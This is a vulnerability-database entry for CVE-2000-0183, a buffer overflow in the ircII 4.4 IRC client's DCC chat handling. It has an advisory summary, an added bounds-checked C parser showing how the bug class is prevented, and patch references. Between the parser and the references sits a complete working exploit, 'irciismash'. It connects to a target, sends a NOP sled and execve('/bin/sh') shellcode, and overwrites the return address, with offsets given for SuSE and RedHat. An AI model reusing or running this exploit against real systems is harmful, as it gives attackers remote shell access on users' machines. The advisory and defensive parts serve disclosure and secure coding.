IrcII DCC Chat Buffer Overflow Vulnerability
| Vulnerability ID | 1105746 | Vulnerability type | Buffer overflow |
| Published | 2000-03-10 | Updated | 2005-05-02 |
| CVE | CVE-2000-0183 | | |
| CNNVD-ID | CNNVD-200003-020 | | |
| Platform | Linux | CVSS score | 5.1 |
|Vulnerability source
|Vulnerability details
The ircII IRC client version 4.4 contains a buffer overflow vulnerability. A remote attacker can execute commands via the DCC chat feature.
|Vulnerability exploit (EXP)
source: http://www.securityfocus.com/bid/1046/info
IrcII is a well-known Internet Relay Chat (IRC) client for unix. Version 4.4-7 and possibly previous versions are known to be vulnerable to a buffer overflow condition in their direct client-to-client (DCC) chat implementation. It may be possible to execute arbitrary code on a client attempting to initiate a DCC chat. Exploitation of this vulnerability could result in a remote compromise with the privileges of the user running the ircII client.
This vulnerability was present in the "port" made available with FreeBSD. It is not installed by default.
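The advisory describes the bug class (an unbounded copy while handling the DCC chat handshake) but not the faulty code itself. The following is an added example written for this page, not ircII's own source: a bounds-checked parser for the DCC CHAT request line (`DCC CHAT chat <ip-as-decimal-uint32> <port>`) that shows the handling which prevents this kind of overflow. Every token is length-checked before it is copied into a fixed-size buffer, numeric fields are validated completely, and any request that does not fit or does not parse is rejected rather than copied. The struct layout, buffer sizes and the names `parse_dcc_chat`, `take_token`, `parse_u32` and `sample_overlong` are this example's own assumptions; the sample requests are constructed, not captured traffic.

```c
/* Added example for this page (not ircII code): bounds-checked parsing of a
 * DCC CHAT handshake line. Buffer sizes and names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <stdint.h>

#define DCC_MAX_TYPE 16    /* room for "chat" plus a safety margin */
#define DCC_MAX_LINE 512   /* IRC line limit: upper bound on any request */

struct dcc_chat_req {
    char type[DCC_MAX_TYPE];
    uint32_t ip;           /* IPv4 address in host order, as sent in decimal */
    uint16_t port;
};

/* Copy one space-delimited token into dst (size dstsz).
 * Returns a pointer just past the token, or NULL if the token is empty or
 * would not fit together with its terminating NUL. Nothing is copied in the
 * failure case, so an oversized field can never run past the buffer. */
static const char *take_token(const char *p, char *dst, size_t dstsz)
{
    size_t n = 0;
    while (*p == ' ') p++;
    while (p[n] != '\0' && p[n] != ' ') {
        if (n + 1 >= dstsz)
            return NULL;   /* refuse instead of truncating or overflowing */
        n++;
    }
    if (n == 0) return NULL;
    memcpy(dst, p, n);
    dst[n] = '\0';
    return p + n;
}

/* Parse a whole token as an unsigned decimal number no larger than max.
 * Signs, trailing junk, empty input and overflow are all rejected. */
static int parse_u32(const char *s, uint32_t max, uint32_t *out)
{
    char *end;
    unsigned long v;
    if (!isdigit((unsigned char)s[0])) return -1;
    errno = 0;
    v = strtoul(s, &end, 10);
    if (errno != 0 || *end != '\0' || v > max) return -1;
    *out = (uint32_t)v;
    return 0;
}

/* Returns 0 and fills *req for a well-formed request, -1 otherwise. */
int parse_dcc_chat(const char *line, struct dcc_chat_req *req)
{
    char tok[32];
    const char *p = line;
    uint32_t v;

    if (line == NULL || strlen(line) >= DCC_MAX_LINE) return -1;
    if ((p = take_token(p, tok, sizeof tok)) == NULL || strcmp(tok, "DCC") != 0) return -1;
    if ((p = take_token(p, tok, sizeof tok)) == NULL || strcmp(tok, "CHAT") != 0) return -1;
    /* The chat type lands directly in the fixed-size field, bounded by its size. */
    if ((p = take_token(p, req->type, sizeof req->type)) == NULL) return -1;
    if ((p = take_token(p, tok, sizeof tok)) == NULL || parse_u32(tok, UINT32_MAX, &v) != 0) return -1;
    req->ip = v;
    if ((p = take_token(p, tok, sizeof tok)) == NULL || parse_u32(tok, 65535, &v) != 0 || v == 0) return -1;
    req->port = (uint16_t)v;
    while (*p == ' ') p++;
    return *p == '\0' ? 0 : -1;   /* trailing garbage is rejected too */
}

/* Constructed sample: a request whose chat-type field is 300 bytes long. */
const char *sample_overlong(void)
{
    static char buf[DCC_MAX_LINE];
    size_t n = 0;
    memcpy(buf, "DCC CHAT ", 9);            n += 9;
    memset(buf + n, 'A', 300);              n += 300;
    memcpy(buf + n, " 3232235777 1024", 16); n += 16;
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    struct dcc_chat_req r;
    /* Constructed sample request: 3232235777 is 192.168.1.1 in decimal. */
    if (parse_dcc_chat("DCC CHAT chat 3232235777 1024", &r) == 0)
        printf("accepted: type=%s ip=%lu port=%u\n", r.type, (unsigned long)r.ip, r.port);
    printf("overlong type rejected: %s\n",
           parse_dcc_chat(sample_overlong(), &r) == -1 ? "yes" : "no");
    printf("bad port rejected: %s\n",
           parse_dcc_chat("DCC CHAT chat 3232235777 70000", &r) == -1 ? "yes" : "no");
    return 0;
}
```

The design choice worth noting is that `take_token` fails closed: a field that does not fit is never copied at all, which is what turns this class of bug into a rejected request instead of a stack write past the end of a buffer.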
/*
ircii-4.4 exploit by bladi & aLmUDeNa
buffer overflow in ircii dcc chat
allows executing arbitrary code
Affected:
ircII-4.4
Patch:
Upgrade to ircII-4.4M
ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz
Offset:
SuSe 6.x :0xbfffe3ff
RedHat :0xbfffe888
Thanks to : #warinhell,#hacker_novatos
Special thanks go to: Topo[lb],
Greetings to everyone who knows us, especially eva ;)
([email protected])
*/
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Resolve a hostname to a dotted-quad string; exits if resolution fails. */
char *h_to_ip(char *hostname)
{
    struct hostent *hozt;
    struct in_addr in;

    if ((hozt = gethostbyname(hostname)) == NULL) {
        printf(" ERROR: IP incorrecta\n");
        exit(0);
    }
    memcpy(&in, hozt->h_addr, sizeof(in));
    return inet_ntoa(in);
}

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    char *hostname;
    /* 16 NOP bytes, sent 47 times as the sled */
    char nops[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    /* execve("/bin/sh") shellcode */
    char *shell =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    int outsocket, i;

    printf(" irciismash ver: 1.0\n");
    printf(" by \n");
    printf(" bladi & aLmUDeNa\n\n");
    if (argc < 3) {
        printf("Usage : %s hostname port\n", argv[0]);
        exit(-1);
    }
    hostname = argv[1];
    outsocket = socket(AF_INET, SOCK_STREAM, 0);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_addr.s_addr = inet_addr(h_to_ip(hostname));
    if (connect(outsocket, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        printf(" ERROR: El puerto esta cerradito :_(\n");
        exit(0);
    }
    /* [1] NOP sled */
    printf("[1]- Noping\n [");
    for (i = 0; i < 47; i++) {
        if (!(i % 7)) { usleep(9); printf("."); fflush(stdout); }
        write(outsocket, nops, strlen(nops));
    }
    printf("]\n");
    printf(" Noped\n");
    /* [2] shellcode */
    printf("[2]- Injectin shellcode\n");
    write(outsocket, shell, strlen(shell));
    usleep(999);
    printf(" Injected\n");
    /* [3] the four address bytes, one per write, repeated 299 times,
     * in the order the authors wrote them */
    printf("[3]- Waiting\n [");
    for (i = 0; i < 299; i++) {
        printf(".");
        fflush(stdout);
        usleep(99);
        write(outsocket, "\xff", 1);
        write(outsocket, "\xbf", 1);
        write(outsocket, "\xff", 1);
        write(outsocket, "\xe3", 1);
    }
    printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
    close(outsocket);
    return 0;
}
|References
Source: BID
Name: 1046
Link: http://www.securityfocus.com/bid/1046
Source: REDHAT
Name: RHSA-2000:008
Link: http://www.redhat.com/support/errata/RHSA-2000-008.html
Source: BUGTRAQ
Name: 20000310 Fwd: ircii-4.4 buffer overflow
Link: http://archives.neohapsis.com/archives/bugtraq/2000-03/0093.html